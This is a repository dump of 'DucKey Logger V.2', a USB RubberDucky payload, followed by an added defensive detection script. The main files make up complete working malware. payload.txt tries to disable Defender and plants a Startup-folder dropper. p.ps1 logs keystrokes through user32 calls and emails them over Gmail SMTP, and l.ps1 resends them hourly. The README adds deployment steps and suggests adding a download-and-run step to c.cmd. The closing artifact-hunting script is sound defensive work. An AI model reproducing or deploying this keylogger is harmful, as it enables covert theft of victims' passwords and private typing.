├── LICENSE
├── README.md
├── c.cmd
├── l.ps1
├── p.ps1
└── payload.txt

/LICENSE:
--------------------------------------------------------------------------------
BSD 3-Clause License [MODIFIED]

Copyright (c) 2020, Cosmodium CyberSecurity
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this
  list of conditions and the following disclaimer.

* Redistributions in binary form must reproduce the above copyright notice,
  this list of conditions and the following disclaimer in the documentation
  and/or other materials provided with the distribution.

* Neither the name of the copyright holder nor the names of its
  contributors may be used to endorse or promote products derived from
  this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# DucKey Logger V.2
> Chris Taylor [Blue Cosmo] | 08/24/21
---

```
::::::::: ::: ::: :::::::: ::: ::: :::::::::: ::: :::
:+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#+ +:+ +#+ +#++:++ +#++:++# +#++:
+#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+# #+# #+# #+# #+#
######### ######## ######## ### ### ########## ###
```

## Update:
**A new version of this payload is available [HERE](https://github.com/CosmodiumCS/DucKeyhook)**

## Overview:
```
DucKey Logger is a USB RubberDucky payload that uses PowerShell to log keystrokes
```
- *payload.txt* copies *c.cmd* into the user's Windows Startup directory and *p.ps1* and *l.ps1* into *%TEMP%*
- *c.cmd* runs at every startup and launches *p.ps1* and *l.ps1* in hidden PowerShell windows
- *p.ps1* emails the current log, starts a fresh *%TEMP%\<username>.log*, then logs keystrokes into it
- *l.ps1* relaunches *p.ps1* at every whole hour, so the logs are emailed [via SMTP] at every startup and every hour
- the hourly sends follow the target's local clock (the `$logTimes` list in *l.ps1*), not the time elapsed since boot

## Resources:
- [YouTube Video](https://www.youtube.com/watch?v=uHIZZYFeVJA)
- [YouTube Channel](https://youtube.com/cosmodiumcs)
- [Website](https://cosmodiumcs.com)

## Requirements:
- Twin-Duck firmware (exposes the ducky's SD card as a mass-storage volume, so stage 3 of the payload can copy the scripts from it)
- Gmail account
  - I suggest making a separate Gmail account for this payload
  - your Gmail must have [LSA Access](https://myaccount.google.com/lesssecureapps) (Less Secure Apps) enabled; Google retired that setting in 2022, so on a current account use an [App Password](https://myaccount.google.com/apppasswords) (requires 2-Step Verification) as the `$password` in *p.ps1*
- Windows 10 target

## Instructions:
Set-Up/Installation
1. change Gmail credentials in *p.ps1*
```powershell
# gmail credentials
$email = "example@gmail.com"
$password = "password"
```
2. in the STAGE 3 `STRING` line of *payload.txt*, change `'L'` to the volume label of your ducky [SD card]
```powershell
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'L'}|select name;cd $u.name;cp .\p.ps1 $env:temp;cp .\l.ps1 $env:temp;cp .\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log";
```
3. flash Twin-Duck firmware on to your duck
   - [Tutorial](https://www.youtube.com/watch?v=BzYH-BPHLpE)
4. load, encode, and deploy!!

## Extraneous:
The *c.cmd* attack opportunity
```
The c.cmd file runs at every startup.
This means an attacker could add a 'wget'
(PowerShell's alias for Invoke-WebRequest) call to it
and have a file downloaded from anywhere on the internet onto the computer.
If that file is saved into the startup directory,
it will also run at every startup.
```
---
- hope you enjoy the payload!!
- please subscribe to my [YouTube channel](https://youtube.com/cosmodiumcs) :)

--------------------------------------------------------------------------------
/c.cmd:
--------------------------------------------------------------------------------
@echo off
:: launched from the Startup folder: start the keylogger and the hourly
:: scheduler (both copied to %TEMP% by payload.txt) in hidden PowerShell windows
powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/p.ps1"
powershell Start-Process powershell.exe -windowstyle hidden "$env:temp/l.ps1"
--------------------------------------------------------------------------------
/l.ps1:
--------------------------------------------------------------------------------
# powershell log scheduler
# created by : C0SM0

# times logs will be sent [keep in 24-hour format]
$logTimes = @(
    '00:00:00',
    '01:00:00',
    '02:00:00',
    '03:00:00',
    '04:00:00',
    '05:00:00',
    '06:00:00',
    '07:00:00',
    '08:00:00',
    '09:00:00',
    '10:00:00',
    '11:00:00',
    '12:00:00',
    '13:00:00',
    '14:00:00',
    '15:00:00',
    '16:00:00',
    '17:00:00',
    '18:00:00',
    '19:00:00',
    '20:00:00',
    '21:00:00',
    '22:00:00',
    '23:00:00'
)

# sort the times in chronological order
$logTimes = $logTimes | Sort-Object

# ensure keylogger runs every day
while ($true) {

    $now = Get-Date

    # next trigger: the earliest list time still ahead of us today,
    # otherwise the first list time tomorrow (so midnight is not skipped)
    $next = $logTimes |
        ForEach-Object { Get-Date -Date $_ } |
        Where-Object { $_ -gt $now } |
        Select-Object -First 1
    if (-not $next) {
        $next = (Get-Date -Date $logTimes[0]).AddDays(1)
    }

    # sleep until the trigger time is reached (no busy loop)
    while ((Get-Date) -lt $next) {
        $remaining = $next - (Get-Date)
        Start-Sleep -Milliseconds ([Math]::Max(1, [int]$remaining.TotalMilliseconds))
    }

    # launch a new hidden p.ps1: it emails the log collected so far and starts a fresh one
    Start-Process powershell.exe -WindowStyle Hidden -ArgumentList "-File `"$env:TEMP\p.ps1`""
}
--------------------------------------------------------------------------------
/p.ps1:
--------------------------------------------------------------------------------
# powershell keylogger
# created by : C0SM0

# gmail credentials
$email = "example@gmail.com"
$password = "password"

# keylogger
function KeyLogger($logFile = "$env:temp/$env:UserName.log") {

    # email process: send the log collected so far
    # (the file is created by payload.txt on first run and by this function afterwards)
    $subject = "$env:UserName logs"
    $smtp = New-Object System.Net.Mail.SmtpClient("smtp.gmail.com", 587)
    $smtp.EnableSsl = $true
    $smtp.Credentials = New-Object System.Net.NetworkCredential($email, $password)
    $logs = Get-Content -Path $logFile -Raw
    $smtp.Send($email, $email, $subject, $logs)

    # generate a fresh (empty) log file
    $null = New-Item -Path $logFile -ItemType File -Force

    # Win32 API signatures
    $APIsignatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@

    # set up API
    $API = Add-Type -MemberDefinition $APIsignatures -Name 'Win32' -Namespace API -PassThru

    # attempt to log keystrokes
    try {
        while ($true) {
            Start-Sleep -Milliseconds 40

            # poll every virtual-key code from TAB (9) upward
            for ($ascii = 9; $ascii -le 254; $ascii++) {

                # use API to get key state
                $keystate = $API::GetAsyncKeyState($ascii)

                # 0x8001 (-32767 as a short): key is down now and was pressed since the last poll
                if ($keystate -eq -32767) {
                    # read Caps Lock state (value unused)
                    $null = [console]::CapsLock

                    # map virtual key
                    $mapKey = $API::MapVirtualKey($ascii, 3)

                    # capture the current keyboard state (shift, caps lock, ...) for translation
                    $keyboardState = New-Object Byte[] 256
                    $null = $API::GetKeyboardState($keyboardState)
                    $loggedchar = New-Object -TypeName System.Text.StringBuilder

                    # translate virtual key to the character it produces
                    if ($API::ToUnicode($ascii, $mapKey, $keyboardState, $loggedchar, $loggedchar.Capacity, 0)) {
                        # add logged key to file
                        [System.IO.File]::AppendAllText($logFile, $loggedchar, [System.Text.Encoding]::Unicode)
                    }
                }
            }
        }
    }

    # send whatever was logged if the loop dies
    finally {
        # re-read the file: $logs from above holds the previous log, not this run's
        $logs = Get-Content -Path $logFile -Raw
        $smtp.Send($email, $email, $subject, $logs)
    }
}

# run keylogger
KeyLogger
--------------------------------------------------------------------------------
/payload.txt:
--------------------------------------------------------------------------------
REM Powershell Keylogger for the USB RubberDucky
REM created by : C0SM0

REM STAGE 1
REM open the Run box and start an (unelevated) PowerShell
DELAY 1000
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 300

REM STAGE 2
REM attempts to disable Defender real-time monitoring
REM (Set-MpPreference needs an elevated shell and Tamper Protection blocks the
REM change; the error is non-terminating, so the rest of the line still runs)
STRING Set-MpPreference -DisableRealtimeMonitoring $true;

REM STAGE 3
REM copy files to the appropriate directories
REM change 'L' to the volume label of your ducky [SD card]
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'L'}|select name;cd $u.name;cp .\p.ps1 $env:temp;cp .\l.ps1 $env:temp;cp .\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log";
ENTER
DELAY 200

REM comment out the option you decide NOT to use

REM STAGE 4
REM run keylogger
STRING cd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";.\c.cmd;exit

REM STAGE 5
REM deploy
ENTER
--------------------------------------------------------------------------------
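The stages in payload.txt above, together with c.cmd, l.ps1 and p.ps1, leave a fixed set of artifacts on the target: a .cmd dropper in the per-user Startup folder, p.ps1, l.ps1 and "<username>.log" in %TEMP%, hidden powershell.exe processes running a script from %TEMP%, and (if stage 2 succeeded) Defender real-time monitoring switched off. The following PowerShell script is an added example, not part of the DucKey Logger repository: it checks a Windows host for those artifacts from the defender's side. The paths, file names and signature strings it looks for are taken from the files above; the regular expressions and the `$findings` reporting format are my own choices.

```powershell
# Added example (not part of DucKey Logger): look for the artifacts the payload
# leaves behind. Run it as the affected user, since the Startup folder and %TEMP%
# are per-user. Paths/names come from payload.txt, c.cmd, l.ps1 and p.ps1.

$startup  = Join-Path $env:APPDATA 'Microsoft\Windows\Start Menu\Programs\Startup'
$findings = @()

# 1. The dropper in the per-user Startup folder: a .cmd that launches hidden PowerShell
Get-ChildItem -Path $startup -Filter *.cmd -ErrorAction SilentlyContinue | ForEach-Object {
    $body = Get-Content -Path $_.FullName -Raw -ErrorAction SilentlyContinue
    if ($body -match 'Start-Process\s+powershell\.exe\s+-windowstyle\s+hidden') {
        $findings += "Startup dropper: $($_.FullName)"
    }
}

# 2. The staged scripts and the keystroke log in %TEMP%
foreach ($name in 'p.ps1', 'l.ps1', "$env:UserName.log") {
    $path = Join-Path $env:TEMP $name
    if (Test-Path -Path $path) { $findings += "Staged file: $path" }
}

# 3. Any .ps1 in %TEMP% that combines the user32 keystroke polling with SMTP sending
#    (the two signature strings p.ps1 declares: GetAsyncKeyState and SmtpClient)
foreach ($script in Get-ChildItem -Path $env:TEMP -Filter *.ps1 -ErrorAction SilentlyContinue) {
    $body = Get-Content -Path $script.FullName -Raw -ErrorAction SilentlyContinue
    if ($body -match 'GetAsyncKeyState' -and $body -match 'SmtpClient') {
        $findings += "Keylogger with SMTP exfil: $($script.FullName)"
    }
}

# 4. Running powershell.exe processes whose command line points into %TEMP%
#    (c.cmd and l.ps1 both start p.ps1/l.ps1 from there)
$tempPattern = [regex]::Escape($env:TEMP)
Get-CimInstance -ClassName Win32_Process -Filter "Name = 'powershell.exe'" | ForEach-Object {
    if ($_.CommandLine -and $_.CommandLine -match $tempPattern) {
        $findings += "powershell running a script from TEMP (PID $($_.ProcessId)): $($_.CommandLine)"
    }
}

# 5. Defender real-time monitoring state (stage 2 of the payload tries to disable it)
try {
    $mp = Get-MpPreference -ErrorAction Stop
    if ($mp.DisableRealtimeMonitoring) {
        $findings += 'Defender real-time monitoring is DISABLED'
    }
} catch {
    $findings += "Could not query Defender preferences: $($_.Exception.Message)"
}

if ($findings.Count -eq 0) {
    'No DucKey Logger artifacts found.'
} else {
    $findings
}
```

Checks 1 to 4 need no elevation because every artifact lives under the current user's profile; the Defender query in check 5 is wrapped in try/catch so the script still reports the file and process findings on a host where the Defender module is unavailable.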